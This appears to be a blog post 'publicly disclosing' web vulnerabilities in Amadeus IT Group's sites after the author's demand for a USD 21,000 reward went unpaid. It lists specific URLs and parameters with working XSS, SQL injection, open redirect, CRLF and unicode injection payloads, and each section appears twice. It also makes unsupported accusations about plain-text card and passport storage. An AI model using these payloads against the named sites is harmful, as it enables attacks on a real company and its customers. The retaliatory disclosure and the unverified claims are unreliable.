Public Disclosure - Amadeus IT Group
Download PoC & Conversation screenshots:-
Password for PDF: whiteHatMrNervous
Summary:
| Date First Contacted | : | December 27, 2013 |
| Reward demanded | : | USD 21,000 |
| Any Reward Paid | : | No |
| Communication Channel | : | Company rep only conversed via blog comments, gmail and hotmail ID, screenshots attached. Never used their official email, but traced IP of blog comment to Amadeus SAAS, FR |
| Vulnerability List | SQL Injection, Cross site scripting, HTTP Parameter Pollution, CRLF Injection, Open Redirect, Unicode transformation Issues | |
| Infected object | : | Main website & sub-domains |
| Retest Infection | : | Definitely will |
| Leaked database dump/files | : | None |
| Received Respect | : | No |
| Received Appreciation for Intimation about Existence of Security Vulnerabilities | : | No |
| Hall of Fame | : | No |
Amadeus IT Group (your technology partner) – Transaction processor for the global travel and tourism industry.
Amadeus IT Group is the most used GDS (Global Distribution System, France based, Germany influenced) by Travel & Tour companies. Amadeus IT Group stores confidential client data in plain text on their servers. This data is stored and used by Travel & tour companies that operate Amadeus GDS. Amadeus GDS has a feature called client profile, wherein each employee of the company can create/access/modify data of their companies clients. This data includes Full name, date of birth, address, Passport & visa details, Credit card numbers with pin and expiry details. Their web service and GDS application is also vulnerable to stack overflow, remote code execution, etc. And their website is vulnerable to what-so-ever is mentioned below. Amadeus IT Group is a virgin, only is known largely by and in Travel & Tour industry. Hence, Hat Hackers never audited security of Amadeus IT Group and its various products.
A] Cross Site Scripting (Amadeus XSS)
1. URL: amadeus.com/cgi-bin/appl/list.pl [Get]
Infected Parameters: 3 (whiteHatMrNervous reflected in returned source code)
?cat_nr=C97F6457-8274-43D5-8942-2C17F30D8DBA” onmouseover=prompt(whiteHatMrNervous) bad=”
?job_nr=8F3C4897-6F62-40BE-83C2-A802C5AA201E–><ScRiPt>prompt(whiteHatMrNervous)</ScRiPt><!–
?loc_nr=6DC8EDF4-30C5-11D4-B90E-0050BAE619BE–><ScRiPt>prompt(whiteHatMrNervous)</ScRiPt><!–
2. URL: amadeus.com/linkhotel/nominate-hotel.html [POST (multipart) input]
Infected Parameters: 9 (whiteHatMrNervous reflected in returned source code)
?city=San Francisco” onmouseover=prompt(whiteHatMrNervous) bad=”
?clients_corporations=1″ onmouseover=prompt(whiteHatMrNervous) bad=”
?company=MatchMeCupidCheatsFreelancers” onmouseover=prompt(whiteHatMrNervous) bad=”
?email=SalesForce@hasXSS.com” onmouseover=prompt(whiteHatMrNervous) bad=”
?first_name=AmadeusXSS” onmouseover=prompt(whiteHatMrNervous) bad=”
?last_name=HackersParadise” onmouseover=prompt(whiteHatMrNervous) bad=”
?rate_access_code=94102″ onmouseover=prompt(whiteHatMrNervous) bad=”
?telephone=555-666-0606″ onmouseover=prompt(whiteHatMrNervous) bad=”
?top_locations=1″ onmouseover=prompt(whiteHatMrNervous) bad=”
3. URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp [Get]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?srchfor=0_978176%26quot;():; whiteHatMrNervous
4. URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp [Get]
Infected Parameters: 4 (whiteHatMrNervous reflected in returned source code)
?lastname=del”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?postalcode=94102″sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?province=NY”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?username=whiteHatMrNervous”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
5. URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp [Get]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?start=1′sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=’>
6. URL: alc.amadeus.com/ilearn/en/learner/jsp/search_process.jsp [Get]
Infected Parameters: 4 (whiteHatMrNervous reflected in returned source code)
?btn=dosrch”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?keywords=1″sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?srchfor=0′sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=’>
?wrd=1″sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
7. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_validate.jsp [Get]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?nodetree=choosesite”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
1. URL: amadeus.com/cgi-bin/appl/list.pl [Get]
Infected Parameters: 3 (whiteHatMrNervous reflected in returned source code)
?cat_nr=C97F6457-8274-43D5-8942-2C17F30D8DBA” onmouseover=prompt(whiteHatMrNervous) bad=”
?job_nr=8F3C4897-6F62-40BE-83C2-A802C5AA201E–><ScRiPt>prompt(whiteHatMrNervous)</ScRiPt><!–
?loc_nr=6DC8EDF4-30C5-11D4-B90E-0050BAE619BE–><ScRiPt>prompt(whiteHatMrNervous)</ScRiPt><!–
2. URL: amadeus.com/linkhotel/nominate-hotel.html [POST (multipart) input]
Infected Parameters: 9 (whiteHatMrNervous reflected in returned source code)
?city=San Francisco” onmouseover=prompt(whiteHatMrNervous) bad=”
?clients_corporations=1″ onmouseover=prompt(whiteHatMrNervous) bad=”
?company=MatchMeCupidCheatsFreelancers” onmouseover=prompt(whiteHatMrNervous) bad=”
?email=SalesForce@hasXSS.com” onmouseover=prompt(whiteHatMrNervous) bad=”
?first_name=AmadeusXSS” onmouseover=prompt(whiteHatMrNervous) bad=”
?last_name=HackersParadise” onmouseover=prompt(whiteHatMrNervous) bad=”
?rate_access_code=94102″ onmouseover=prompt(whiteHatMrNervous) bad=”
?telephone=555-666-0606″ onmouseover=prompt(whiteHatMrNervous) bad=”
?top_locations=1″ onmouseover=prompt(whiteHatMrNervous) bad=”
3. URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp [Get]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?srchfor=0_978176%26quot;():; whiteHatMrNervous
4. URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp [Get]
Infected Parameters: 4 (whiteHatMrNervous reflected in returned source code)
?lastname=del”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?postalcode=94102″sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?province=NY”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?username=whiteHatMrNervous”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
5. URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp [Get]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?start=1′sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=’>
6. URL: alc.amadeus.com/ilearn/en/learner/jsp/search_process.jsp [Get]
Infected Parameters: 4 (whiteHatMrNervous reflected in returned source code)
?btn=dosrch”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?keywords=1″sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?srchfor=0′sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=’>
?wrd=1″sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
7. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_validate.jsp [Get]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?nodetree=choosesite”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
B] SQL Injection
1. URL: amadeus.com/cgi-bin/appl/list.pl
Infected Parameters: 3
?cat_nr=1′”
?job_nr=1′”
?loc_nr=1′”
2. URL: myamadeus.net/homepage.aspx
Infected Parameter: 2
?ctl00%24txtPwd=’+(select convert(int,CHAR(52)+CHAR(67)) FROM syscolumns)+’
?ctl00%24txtUserid=’+(select convert(int,CHAR(52)+CHAR(67)) FROM syscolumns)+’
1. URL: amadeus.com/cgi-bin/appl/list.pl
Infected Parameters: 3
?cat_nr=1′”
?job_nr=1′”
?loc_nr=1′”
2. URL: myamadeus.net/homepage.aspx
Infected Parameter: 2
?ctl00%24txtPwd=’+(select convert(int,CHAR(52)+CHAR(67)) FROM syscolumns)+’
?ctl00%24txtUserid=’+(select convert(int,CHAR(52)+CHAR(67)) FROM syscolumns)+’
C] Open Redirect
1. URL: amadeus.com/corpweb/amaweb1camp.nsf/request
Infected Parameter: 1
?redirect=http://www.whiteHatMrNervous.blogspot.com
2. URL: amadeus.com/corpweb/eformstawfv2.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
3. URL: amadeus.com/corpweb/eformstowf.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
4. URL: amadeus.com/corpweb/hotelcampaignsen.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
5. URL: amadeus.com/corpweb/newsletters_cars_forms.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
6. URL: amadeus.com/corpweb/online_traveller_study_event.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
1. URL: amadeus.com/corpweb/amaweb1camp.nsf/request
Infected Parameter: 1
?redirect=http://www.whiteHatMrNervous.blogspot.com
2. URL: amadeus.com/corpweb/eformstawfv2.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
3. URL: amadeus.com/corpweb/eformstowf.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
4. URL: amadeus.com/corpweb/hotelcampaignsen.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
5. URL: amadeus.com/corpweb/newsletters_cars_forms.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
6. URL: amadeus.com/corpweb/online_traveller_study_event.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
D] HTTP Parameter Pollution
1. URL: https://jobs.amadeus.com/cgi-bin/appl/cv.pl?action=show&tmpl=templ_cv_1&loc_nr=6DC8EDF4-30C5-11D4-B90E-0050BAE619BE&n980572=v990085
1. URL: https://jobs.amadeus.com/cgi-bin/appl/cv.pl?action=show&tmpl=templ_cv_1&loc_nr=6DC8EDF4-30C5-11D4-B90E-0050BAE619BE&n980572=v990085
E] CRLF Injection
1. URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp
Infected Parameter: 1
?siteid=SomeCustomInjectedHeader:injected_by_whiteHatMrNervous
2. URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp
Infected Parameter: 1
?start=SomeCustomInjectedHeader:injected_by_ whiteHatMrNervous
3. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_validate.jsp
Infected Parameter: 1
?nodetree=SomeCustomInjectedHeader:injected_by_ whiteHatMrNervous
1. URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp
Infected Parameter: 1
?siteid=SomeCustomInjectedHeader:injected_by_whiteHatMrNervous
2. URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp
Infected Parameter: 1
?start=SomeCustomInjectedHeader:injected_by_ whiteHatMrNervous
3. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_validate.jsp
Infected Parameter: 1
?nodetree=SomeCustomInjectedHeader:injected_by_ whiteHatMrNervous
F] Unicode transformation issues
1. URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp
Infected Parameter: 1
?address1= whiteHatMrNervous9929%C0%BEz1%C0%BCz2a%90bcxyyy9929
2. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=pcjndrci&address1=acux9929>z1<z2a%EF%BF%BDbcxuca9929&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?city= whiteHatMrNervous1690%C0%BEz1%C0%BCz2a%90bcxyyy1690
3. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=tbewfsld&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=acux1690>z1<z2a%EF%BF%BDbcxuca1690&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?country= whiteHatMrNervous8949%C0%BEz1%C0%BCz2a%90bcxyyy8949
4. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=ldsbvqpp&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=acux8949>z1<z2a%EF%BF%BDbcxuca8949&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?familiarname= whiteHatMrNervous3871%C0%BEz1%C0%BCz2a%90bcxyyy3871
5. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=acux3871>z1<z2a%EF%BF%BDbcxuca3871&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?firstname= whiteHatMrNervous9454%C0%BEz1%C0%BCz2a%90bcxyyy9454
6. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=acux9454>z1<z2a%EF%BF%BDbcxuca9454&lastname=del&familiarname=ibxwwpis&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?Language= whiteHatMrNervous3664%C0%BEz1%C0%BCz2a%90bcxyyy3664
7. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=ndomggee&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=acux3664>z1<z2a%EF%BF%BDbcxuca3664&Activity=-1&site=Europe&nodetree=choosesite
?lastname= whiteHatMrNervous1260%C0%BEz1%C0%BCz2a%90bcxyyy1260
8. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=acux1260>z1<z2a%EF%BF%BDbcxuca1260&familiarname=ghdjqguv&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?postalcode= whiteHatMrNervous3683%C0%BEz1%C0%BCz2a%90bcxyyy3683
9. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=sngjchwn&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=acux3683>z1<z2a%EF%BF%BDbcxuca3683&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?province= whiteHatMrNervous9518%C0%BEz1%C0%BCz2a%90bcxyyy9518
10. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=jokctcch&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=acux9518>z1<z2a%EF%BF%BDbcxuca9518&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?site= whiteHatMrNervous9340%C0%BEz1%C0%BCz2a%90bcxyyy9340
11. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=iiaukhmo&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=acux9340>z1<z2a%EF%BF%BDbcxuca9340&nodetree=choosesite
?username= whiteHatMrNervous3710%C0%BEz1%C0%BCz2a%90bcxyyy3710
12. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username= whiteHatMrNervous3710>z1<z2a%EF%BF%BDbcxyyy3710&firstname=del&lastname=del&familiarname=lfbykbbn&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
13. URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp?start= whiteHatMrNervous9935%C0%BEz1%C0%BCz2a%90bcxyyy9935
14. URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket.jsp?start= whiteHatMrNervous9935%3Ez1%3Cz2a%FDbcxyyy9935
15. URL: alc.amadeus.com/ilearn/en/learner/jsp/search_process.jsp?btn= whiteHatMrNervous2700%C0%BEz1%C0%BCz2a%90bcxyyy2700
16. URL: alc.amadeus.com/ilearn/en/learner/jsp/search_all.jsp?aor=0&btn=acux2700%C0%BEz1%C0%BCz2a%90bcxuca2700&cert=A&col=0&CompetencyId=&datechoice=S&daterng=1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?keywords= whiteHatMrNervous7201%C0%BEz1%C0%BCz2a%90bcxyyy7201
17. URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=dosrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=acux7201%C0%BEz1%C0%BCz2a%90bcxuca7201&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?srchfor= whiteHatMrNervous5083%C0%BEz1%C0%BCz2a%90bcxyyy5083
18. URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=advsrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=acux5083%C0%BEz1%C0%BCz2a%90bcxuca5083&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?wrd= whiteHatMrNervous4367%C0%BEz1%C0%BCz2a%90bcxyyy4367
19. URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=dosrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd= whiteHatMrNervous4367%C0%BEz1%C0%BCz2a%90bcxyyy4367
1. URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp
Infected Parameter: 1
?address1= whiteHatMrNervous9929%C0%BEz1%C0%BCz2a%90bcxyyy9929
2. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=pcjndrci&address1=acux9929>z1<z2a%EF%BF%BDbcxuca9929&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?city= whiteHatMrNervous1690%C0%BEz1%C0%BCz2a%90bcxyyy1690
3. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=tbewfsld&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=acux1690>z1<z2a%EF%BF%BDbcxuca1690&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?country= whiteHatMrNervous8949%C0%BEz1%C0%BCz2a%90bcxyyy8949
4. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=ldsbvqpp&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=acux8949>z1<z2a%EF%BF%BDbcxuca8949&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?familiarname= whiteHatMrNervous3871%C0%BEz1%C0%BCz2a%90bcxyyy3871
5. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=acux3871>z1<z2a%EF%BF%BDbcxuca3871&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?firstname= whiteHatMrNervous9454%C0%BEz1%C0%BCz2a%90bcxyyy9454
6. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=acux9454>z1<z2a%EF%BF%BDbcxuca9454&lastname=del&familiarname=ibxwwpis&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?Language= whiteHatMrNervous3664%C0%BEz1%C0%BCz2a%90bcxyyy3664
7. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=ndomggee&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=acux3664>z1<z2a%EF%BF%BDbcxuca3664&Activity=-1&site=Europe&nodetree=choosesite
?lastname= whiteHatMrNervous1260%C0%BEz1%C0%BCz2a%90bcxyyy1260
8. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=acux1260>z1<z2a%EF%BF%BDbcxuca1260&familiarname=ghdjqguv&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?postalcode= whiteHatMrNervous3683%C0%BEz1%C0%BCz2a%90bcxyyy3683
9. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=sngjchwn&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=acux3683>z1<z2a%EF%BF%BDbcxuca3683&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?province= whiteHatMrNervous9518%C0%BEz1%C0%BCz2a%90bcxyyy9518
10. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=jokctcch&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=acux9518>z1<z2a%EF%BF%BDbcxuca9518&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?site= whiteHatMrNervous9340%C0%BEz1%C0%BCz2a%90bcxyyy9340
11. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=iiaukhmo&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=acux9340>z1<z2a%EF%BF%BDbcxuca9340&nodetree=choosesite
?username= whiteHatMrNervous3710%C0%BEz1%C0%BCz2a%90bcxyyy3710
12. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username= whiteHatMrNervous3710>z1<z2a%EF%BF%BDbcxyyy3710&firstname=del&lastname=del&familiarname=lfbykbbn&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
13. URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp?start= whiteHatMrNervous9935%C0%BEz1%C0%BCz2a%90bcxyyy9935
14. URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket.jsp?start= whiteHatMrNervous9935%3Ez1%3Cz2a%FDbcxyyy9935
15. URL: alc.amadeus.com/ilearn/en/learner/jsp/search_process.jsp?btn= whiteHatMrNervous2700%C0%BEz1%C0%BCz2a%90bcxyyy2700
16. URL: alc.amadeus.com/ilearn/en/learner/jsp/search_all.jsp?aor=0&btn=acux2700%C0%BEz1%C0%BCz2a%90bcxuca2700&cert=A&col=0&CompetencyId=&datechoice=S&daterng=1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?keywords= whiteHatMrNervous7201%C0%BEz1%C0%BCz2a%90bcxyyy7201
17. URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=dosrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=acux7201%C0%BEz1%C0%BCz2a%90bcxuca7201&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?srchfor= whiteHatMrNervous5083%C0%BEz1%C0%BCz2a%90bcxyyy5083
18. URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=advsrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=acux5083%C0%BEz1%C0%BCz2a%90bcxuca5083&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?wrd= whiteHatMrNervous4367%C0%BEz1%C0%BCz2a%90bcxyyy4367
19. URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=dosrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd= whiteHatMrNervous4367%C0%BEz1%C0%BCz2a%90bcxyyy4367
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Elizabeth Susan Carter – Photography
Store: http://goo.gl/kEa7ul
Facebook: http://goo.gl/mFei5t
Facebook: http://goo.gl/mFei5t
Contact: http://goo.gl/ulA9Lm
About: http://goo.gl/pwPdiq
About: http://goo.gl/pwPdiq
PortFolio:-
No comments:
Post a Comment